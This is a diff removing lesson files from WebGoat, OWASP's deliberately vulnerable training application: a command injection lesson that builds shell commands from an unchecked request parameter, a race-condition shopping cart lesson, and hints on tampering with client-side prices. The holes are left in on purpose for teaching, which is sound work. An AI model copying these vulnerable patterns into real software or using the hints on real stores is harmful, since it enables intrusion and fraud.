-                                                    .setSize(10).setReadOnly(true).setStyle("border:0px;"))
-                .setAlign("right"));
-
-        t.addElement(tr);
-        tr = new TR();
-        tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel<65> Centrino<6E>"));
-
-        tr.addElement(new TD()
-                .addElement(
-                            new Input(Input.TEXT, "PRC3", s.getParser().getStringParameter("PRC3", "$1599.99"))
-                                    .setSize(10).setReadOnly(true).setStyle("border:0px;")).setAlign("right"));
-
-        input = new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", "0"));
-
-        input.setOnKeyUp("updateTotals();");
-        input.setSize(10);
-        tr.addElement(new TD().addElement(input).setAlign("right"));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "TOT3", s.getParser().getStringParameter("TOT3",
-                                                                                                            "$0.00"))
-                                                    .setSize(10).setReadOnly(true).setStyle("border:0px;"))
-                .setAlign("right"));
-
-        t.addElement(tr);
-        tr = new TR();
-        tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "PRC4", s.getParser().getStringParameter("PRC4",
-                                                                                                            "$299.99"))
-                                                    .setSize(10).setReadOnly(true).setStyle("border:0px;"))
-                .setAlign("right"));
-
-        input = new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", "0"));
-
-        input.setOnKeyUp("updateTotals();");
-        input.setSize(10);
-        tr.addElement(new TD().addElement(input).setAlign("right"));
-
-        tr.addElement(new TD().addElement(
-                                            new Input(Input.TEXT, "TOT4", s.getParser().getStringParameter("TOT4",
-                                                                                                            "$0.00"))
-                                                    .setSize(10).setReadOnly(true).setStyle("border:0px;"))
-                .setAlign("right"));
-
-        t.addElement(tr);
-        ec.addElement(t);
-        return ec;
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.AJAX_SECURITY;
-    }
-
-    /**
-     * Gets the hints attribute of the AccessControlScreen object
-     * 
-     * @return The hints value
-     */
-
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        hints.add("Use Firebug to examine the JavaScript.");
-
-        hints.add("Using Firebug, you can add breakpoints in the JavaScript.");
-
-        hints.add("Use Firebug to find the array of encrypted coupon codes, and "
-                + "step through the JavaScript to see the decrypted values.");
-
-        hints.add("You can use Firebug to inspect (and modify) the HTML.");
-
-        hints.add("Use Firebug to remove the 'readonly' attribute from the input next to "
-                + "'The total charged to your credit card:' and set the value to 0.");
-
-        return hints;
-
-    }
-
-    /**
-     * Gets the instructions attribute of the WeakAccessControl object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        if (getLessonTracker(s).getStage() == 1)
-        {
-            instructions = "STAGE 1:\tFor this exercise, your mission is to discover a coupon code to receive an unintended discount.";
-        }
-        else if (getLessonTracker(s).getStage() == 2)
-        {
-            instructions = "STAGE 2:\tNow, try to get your entire order for free.";
-        }
-        return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(120);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the AccessControlScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "Insecure Client Storage";
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("", ASPECT_LOGO);
-    }
-}

src/main/java/org/owasp/webgoat/lessons/CommandInjection.java

@@ -1,298 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.File;
-import java.util.ArrayList;
-import java.util.Arrays;
-import java.util.List;
-import java.util.StringTokenizer;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.P;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.Exec;
-import org.owasp.webgoat.util.ExecResults;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class CommandInjection extends LessonAdapter
-{
-    private final static String HELP_FILE = "HelpFile";
-
-    private String osName = System.getProperty("os.name");
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        boolean illegalCommand = getWebgoatContext().isDefuseOSCommands();
-        try
-        {
-            String helpFile = s.getParser().getRawParameter(HELP_FILE, "BasicAuthentication.help");
-            if (getWebgoatContext().isDefuseOSCommands()
-                    && (helpFile.indexOf('&') != -1 || helpFile.indexOf(';') != -1))
-            {
-                int index = helpFile.indexOf('&');
-                if (index == -1)
-                {
-                    index = helpFile.indexOf(';');
-                }
-                index = index + 1;
-                int helpFileLen = helpFile.length() - 1; // subtract 1 for the closing quote
-                System.out.println(getLabelManager().get("Command")+" = [" + helpFile.substring(index, helpFileLen).trim().toLowerCase() + "]");
-                if ((osName.indexOf("Windows") != -1 && (helpFile.substring(index, helpFileLen).trim().toLowerCase()
-                        .equals("netstat -a")
-                        || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("dir")
-                        || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls")
-                        || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ifconfig") || helpFile
-                        .substring(index, helpFileLen).trim().toLowerCase().equals("ipconfig")))
-                        || (helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("netstat -a #")
-                                || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("dir #")
-                                || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls #")
-                                || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ls -l #")
-                                || helpFile.substring(index, helpFileLen).trim().toLowerCase().equals("ifconfig #") || helpFile
-                                .substring(index, helpFileLen).trim().toLowerCase().equals("ipconfig #")))
-                {
-                    illegalCommand = false;
-                }
-                else
-                {
-                    s.setMessage(getLabelManager().get("CommandInjectionRightTrack1"));
-                            
-                }
-            }
-
-            if (getWebgoatContext().isDefuseOSCommands() && helpFile.indexOf('&') == -1 && helpFile.indexOf(';') == -1)
-            {
-                if (helpFile.length() > 0)
-                {
-                    if (upDirCount(helpFile) <= 3)
-                    {
-                        // FIXME: This value isn't used. What is the goal here?
-                        s.getContext().getRealPath("/");
-                        illegalCommand = false;
-                    }
-                    else
-                    {
-                        s.setMessage(getLabelManager().get("CommandInjectionRightTrack2"));
-                    }
-                }
-                else
-                {
-                    // No Command entered.
-                    illegalCommand = false;
-                }
-            }
-            File safeDir = new File(s.getContext().getRealPath("/lesson_plans/en"));
-
-            ec.addElement(new StringElement(getLabelManager().get("YouAreCurrentlyViewing")+"<b>"
-                    + (helpFile.toString().length() == 0 ? "&lt;"+getLabelManager().get("SelectFileFromListBelow")+"&gt;" : helpFile.toString())
-                    + "</b>"));
-
-            if (!illegalCommand)
-            {
-                String results;
-                String fileData = null;
-                helpFile = helpFile.replaceAll("\\.help", "\\.html");
-
-                if (osName.indexOf("Windows") != -1)
-                {
-                    // Add quotes around the filename to avoid having special characters in DOS
-                    // filenames
-                    results = exec(s, "cmd.exe /c dir /b \"" + safeDir.getPath() + "\"");
-                    fileData = exec(s, "cmd.exe /c type \"" + new File(safeDir, helpFile).getPath() + "\"");
-
-                }
-                else
-                {
-                    String[] cmd1 = { "/bin/sh", "-c", "ls \"" + safeDir.getPath() + "\"" };
-                    results = exec(s, cmd1);
-                    String[] cmd2 = { "/bin/sh", "-c", "cat \"" + new File(safeDir, helpFile).getPath() + "\"" };
-                    fileData = exec(s, cmd2);
-                }
-
-                ec.addElement(new P().addElement(getLabelManager().get("SelectLessonPlanToView")));
-                ec.addElement(ECSFactory.makePulldown(HELP_FILE, parseResults(results.replaceAll("(?s)\\.html",
-                                                                                                    "\\.help"))));
-                // ec.addElement( results );
-                Element b = ECSFactory.makeButton(getLabelManager().get("View"));
-                ec.addElement(b);
-                // Strip out some of the extra html from the "help" file
-                ec.addElement(new BR());
-                ec.addElement(new BR());
-                ec.addElement(new HR().setWidth("90%"));
-                ec.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"), "<br>")
-                        .replaceAll("(?s)<!DOCTYPE.*/head>", "").replaceAll("<br><br>", "<br>")
-                        .replaceAll("<br>\\s<br>", "<br>")));
-
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    private String parseResults(String results)
-    {
-        results.replaceAll("(?s).*Output...\\s", "").replaceAll("(?s)Returncode.*", "");
-        StringTokenizer st = new StringTokenizer(results, "\n");
-        StringBuffer modified = new StringBuffer();
-
-        while (st.hasMoreTokens())
-        {
-            String s = (String) st.nextToken().trim();
-
-            if (s.length() > 0 && s.endsWith(".help"))
-            {
-                modified.append(s + "\n");
-            }
-        }
-
-        return modified.toString();
-    }
-
-    public static int upDirCount(String fileName)
-    {
-        int count = 0;
-        // check for "." = %2d
-        // we wouldn't want anyone bypassing the check by useing encoding :)
-        // FIXME: I don't think hex endoing will work here.
-        fileName = fileName.replaceAll("%2d", ".");
-        int startIndex = fileName.indexOf("..");
-        while (startIndex != -1)
-        {
-            count++;
-            startIndex = fileName.indexOf("..", startIndex + 1);
-        }
-        return count;
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param command
-     *            Description of the Parameter
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    private String exec(WebSession s, String command)
-    {
-        System.out.println("Executing OS command: " + command);
-        ExecResults er = Exec.execSimple(command);
-        if ((command.indexOf("&") != -1 || command.indexOf(";") != -1) && !er.getError())
-        {
-            makeSuccess(s);
-        }
-
-        return (er.toString());
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param command
-     *            Description of the Parameter
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    private String exec(WebSession s, String[] command)
-    {
-        System.out.println("Executing OS command: " + Arrays.asList(command));
-        ExecResults er = Exec.execSimple(command);
-        // the third argument (index 2) will have the command injection in it
-        if ((command[2].indexOf("&") != -1 || command[2].indexOf(";") != -1) && !er.getError())
-        {
-            makeSuccess(s);
-        }
-
-        return (er.toString());
-    }
-
-    /**
-     * Gets the category attribute of the CommandInjection object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.INJECTION;
-    }
-
-    /**
-     * Gets the hints attribute of the DirectoryScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add(getLabelManager().get("CommandInjectionHint1"));
-        hints.add(getLabelManager().get("CommandInjectionHint2"));
-        hints.add(getLabelManager().get("CommandInjectionHint3"));
-        hints.add(getLabelManager().get("CommandInjectionHint4"));
-
-        return hints;
-    }
-
-
-    private final static Integer DEFAULT_RANKING = new Integer(40);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DirectoryScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return "Command Injection";
-    }
-}

src/main/java/org/owasp/webgoat/lessons/ConcurrencyCart.java

@@ -1,620 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.text.NumberFormat;
-import java.util.ArrayList;
-import java.util.List;
-import java.util.Locale;
-import java.util.regex.Pattern;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Center;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.HR;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TH;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Ryan Knell <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created July, 23 2007
- */
-
-public class ConcurrencyCart extends LessonAdapter
-{
-    // Shared Variables
-    private static int total = 0;
-    private static float runningTOTAL = 0;
-    private static int subTOTAL = 0;
-    private static float calcTOTAL = 0;
-    private static int quantity1 = 0;
-    private static int quantity2 = 0;
-    private static int quantity3 = 0;
-    private static int quantity4 = 0;
-    private float ratio = 0;
-    private int discount = 0;
-
-    public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
-            .addElement(
-                        new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
-                                .setVspace(0));
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = null;
-
-        try
-        {
-            String submit = s.getParser().getStringParameter("SUBMIT");
-
-            if ("Purchase".equalsIgnoreCase(submit))
-            {
-                updateQuantity(s);
-                ec = createPurchaseContent(s, quantity1, quantity2, quantity3, quantity4);
-            }
-            else if ("Confirm".equalsIgnoreCase(submit))
-            {
-                ec = confirmation(s, quantity1, quantity2, quantity3, quantity4);
-
-                // Discount
-
-                if (calcTOTAL == 0) // No total cost for items
-                {
-                    discount = 0; // Discount meaningless
-                }
-                else
-                // The expected case -- items cost something
-                {
-                    ratio = runningTOTAL / calcTOTAL;
-                }
-
-                if (calcTOTAL > runningTOTAL)
-                {
-                    // CONGRATS
-                    discount = (int) (100 * (1 - ratio));
-                    s.setMessage("Thank you for shopping! You have (illegally!) received a " + discount
-                            + "% discount. Police are on the way to your IP address.");
-
-                    makeSuccess(s);
-                }
-                else if (calcTOTAL < runningTOTAL)
-                {
-                    // ALMOST
-                    discount = (int) (100 * (ratio - 1));
-                    s.setMessage("You are on the right track, but you actually overpaid by " + discount
-                            + "%. Try again!");
-                }
-            }
-            else
-            {
-                updateQuantity(s);
-                ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4);
-            }
-
-        } catch (ParameterNotFoundException pnfe)
-        {
-            // System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage");
-            ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4);
-        }
-
-        return ec;
-    }
-
-    // UPDATE QUANTITY VARIABLES
-    private void updateQuantity(WebSession s)
-    {
-        quantity1 = thinkPositive(s.getParser().getIntParameter("QTY1", 0));
-        quantity2 = thinkPositive(s.getParser().getIntParameter("QTY2", 0));
-        quantity3 = thinkPositive(s.getParser().getIntParameter("QTY3", 0));
-        quantity4 = thinkPositive(s.getParser().getIntParameter("QTY4", 0));
-    }
-
-    /*
-     * PURCHASING PAGE
-     */
-
-    private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3,
-            int quantity4)
-    {
-
-        ElementContainer ec = new ElementContainer();
-        runningTOTAL = 0;
-
-        String regex1 = "^[0-9]{3}$";// any three digits
-        Pattern pattern1 = Pattern.compile(regex1);
-
-        try
-        {
-            String param1 = s.getParser().getRawParameter("PAC", "111");
-            String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("CC", "5321 1337 8888 2007"));
-
-            // test input field1
-            if (!pattern1.matcher(param1).matches())
-            {
-                s.setMessage("Error! You entered " + HtmlEncoder.encode(param1)
-                        + " instead of your 3 digit code.  Please try again.");
-            }
-
-            ec.addElement(new HR().setWidth("90%"));
-            ec.addElement(new Center().addElement(new H1().addElement("Place your order ")));
-            Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
-                    .setAlign("center");
-
-            if (s.isColor())
-            {
-                table.setBorder(1);
-            }
-
-            // Table Setup
-            TR tr = new TR();
-            tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
-            tr.addElement(new TH().addElement("Price").setWidth("10%"));
-            tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-            tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
-            table.addElement(tr);
-
-            // Item 1
-            tr = new TR(); // Create a new table object
-            tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
-            tr.addElement(new TD().addElement("$169.00").setAlign("right"));
-            tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center"));
-
-            total = quantity1 * 169;
-            runningTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr); // Adds table to the HTML
-
-            // Item 2
-            tr = new TR();
-            tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
-            tr.addElement(new TD().addElement("$299.00").setAlign("right"));
-            tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center"));
-
-            total = quantity2 * 299;
-            runningTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            // Item 3
-            tr = new TR();
-            tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
-            tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
-            tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center"));
-
-            total = quantity3 * 1799;
-            runningTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            // Item 4
-            tr = new TR();
-            tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
-            tr.addElement(new TD().addElement("$649.00").setAlign("right"));
-            tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center"));
-
-            total = quantity4 * 649;
-            runningTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            ec.addElement(table);
-
-            table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                table.setBorder(1);
-            }
-
-            ec.addElement(new BR());
-
-            calcTOTAL = runningTOTAL;
-
-            // Total Charged
-            tr = new TR();
-            tr.addElement(new TD().addElement("Total:"));
-            tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right"));
-            table.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-            table.addElement(tr);
-
-            // Credit Card Input
-            tr = new TR();
-            tr.addElement(new TD().addElement("Enter your credit card number:"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "CC", param2)).setAlign("right"));
-            table.addElement(tr);
-
-            // PAC Input
-            tr = new TR();
-            tr.addElement(new TD().addElement("Enter your three digit access code:"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "PAC", param1)).setAlign("right"));
-            table.addElement(tr);
-
-            // Confirm Button
-            Element b = ECSFactory.makeButton("Confirm");
-            tr = new TR();
-            tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
-            table.addElement(tr);
-
-            // Cancel Button
-            Element c = ECSFactory.makeButton("Cancel");
-            tr = new TR();
-            tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right"));
-            table.addElement(tr);
-
-            ec.addElement(table);
-            ec.addElement(new BR());
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /*
-     * CONFIRMATION PAGE
-     */
-
-    private ElementContainer confirmation(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        final String confNumber = "CONC-88";
-        calcTOTAL = 0;
-        try
-        {
-            // Thread.sleep(5000);
-
-            ec.addElement(new HR().setWidth("90%"));
-            ec.addElement(new Center().addElement(new H1().addElement("Thank you for your purchase!")));
-            ec.addElement(new Center().addElement(new H1().addElement("Confirmation number: " + confNumber)));
-            Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
-                    .setAlign("center");
-
-            if (s.isColor())
-            {
-                table.setBorder(1);
-            }
-
-            // Table Setup
-            TR tr = new TR();
-            tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
-            tr.addElement(new TH().addElement("Price").setWidth("10%"));
-            tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-            tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
-            table.addElement(tr);
-
-            // Item 1
-            tr = new TR(); // Create a new table object
-            tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
-            tr.addElement(new TD().addElement("$169.00").setAlign("right"));
-            tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center"));
-
-            total = quantity1 * 169;
-            calcTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr); // Adds table to the HTML
-
-            // Item 2
-            tr = new TR();
-            tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
-            tr.addElement(new TD().addElement("$299.00").setAlign("right"));
-            tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center"));
-
-            total = quantity2 * 299;
-            calcTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            // Item 3
-            tr = new TR();
-            tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
-            tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
-            tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center"));
-
-            total = quantity3 * 1799;
-            calcTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            // Item 4
-            tr = new TR();
-            tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
-            tr.addElement(new TD().addElement("$649.00").setAlign("right"));
-            tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center"));
-
-            total = quantity4 * 649;
-            calcTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            ec.addElement(table);
-
-            table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                table.setBorder(1);
-            }
-
-            ec.addElement(new BR());
-
-            // Total Charged
-            tr = new TR();
-            tr.addElement(new TD().addElement("Total Amount Charged to Your Credit Card:"));
-            tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right"));
-            table.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-            table.addElement(tr);
-
-            // Return to Store Button
-            Element b = ECSFactory.makeButton("Return to Store");
-            tr = new TR();
-            tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
-            table.addElement(tr);
-
-            ec.addElement(table);
-            ec.addElement(new BR());
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return (ec);
-    }
-
-    /*
-     * SHOPPING PAGE
-     */
-
-    private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
-    {
-
-        ElementContainer ec = new ElementContainer();
-        subTOTAL = 0;
-
-        try
-        {
-
-            ec.addElement(new HR().setWidth("90%"));
-            ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
-            Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
-                    .setAlign("center");
-
-            if (s.isColor())
-            {
-                table.setBorder(1);
-            }
-
-            // Table Setup
-            TR tr = new TR();
-            tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
-            tr.addElement(new TH().addElement("Price").setWidth("10%"));
-            tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-            tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
-            table.addElement(tr);
-
-            // Item 1
-            tr = new TR(); // Create a new table object
-            tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
-            tr.addElement(new TD().addElement("$169.00").setAlign("right"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY1", String.valueOf(quantity1)))
-                    .setAlign("right"));
-
-            total = quantity1 * 169;
-            subTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr); // Adds table to the HTML
-
-            // Item 2
-            tr = new TR();
-            tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
-            tr.addElement(new TD().addElement("$299.00").setAlign("right"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY2", String.valueOf(quantity2)))
-                    .setAlign("right"));
-
-            total = quantity2 * 299;
-            subTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            // Item 3
-            tr = new TR();
-            tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
-            tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY3", String.valueOf(quantity3)))
-                    .setAlign("right"));
-
-            total = quantity3 * 1799;
-            subTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            // Item 4
-            tr = new TR();
-            tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
-            tr.addElement(new TD().addElement("$649.00").setAlign("right"));
-            tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY4", String.valueOf(quantity4)))
-                    .setAlign("right"));
-
-            total = quantity4 * 649;
-            subTOTAL += total;
-            tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
-            table.addElement(tr);
-
-            ec.addElement(table);
-
-            table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-            if (s.isColor())
-            {
-                table.setBorder(1);
-            }
-
-            ec.addElement(new BR());
-
-            // Purchasing Amount
-            tr = new TR();
-            tr.addElement(new TD().addElement("Total: " + "$" + formatInt(subTOTAL) + ".00").setAlign("left"));
-            table.addElement(tr);
-
-            // Update Button
-            Element b = ECSFactory.makeButton("Update Cart");
-            tr = new TR();
-            tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
-            table.addElement(tr);
-
-            tr = new TR();
-            tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-            table.addElement(tr);
-
-            // Purchase Button
-            Element c = ECSFactory.makeButton("Purchase");
-            tr = new TR();
-            tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right"));
-            table.addElement(tr);
-
-            ec.addElement(table);
-            ec.addElement(new BR());
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return (ec);
-    }
-
-    String formatInt(int i)
-    {
-        NumberFormat intFormat = NumberFormat.getIntegerInstance(Locale.US);
-        return intFormat.format(i);
-    }
-
-    String formatFloat(float f)
-    {
-        NumberFormat floatFormat = NumberFormat.getNumberInstance(Locale.US);
-        floatFormat.setMinimumFractionDigits(2);
-        floatFormat.setMaximumFractionDigits(2);
-        return floatFormat.format(f);
-    }
-
-    int thinkPositive(int i)
-    {
-        if (i < 0)
-            return 0;
-        else
-            return i;
-    }
-
-    /**
-     * DOCUMENT ME!
-     * 
-     * @return DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.CONCURRENCY;
-    }
-
-    /**
-     * Gets the hints attribute of the AccessControlScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Can you purchase the merchandise in your shopping cart for a lower price?");
-        hints.add("Try using a new browser window to get a lower price.");
-        hints.add("In window A, purchase a low cost item. In window B, update the card with a high cost item.");
-        hints.add("In window A, commit after updating cart in window B.");
-
-        return hints;
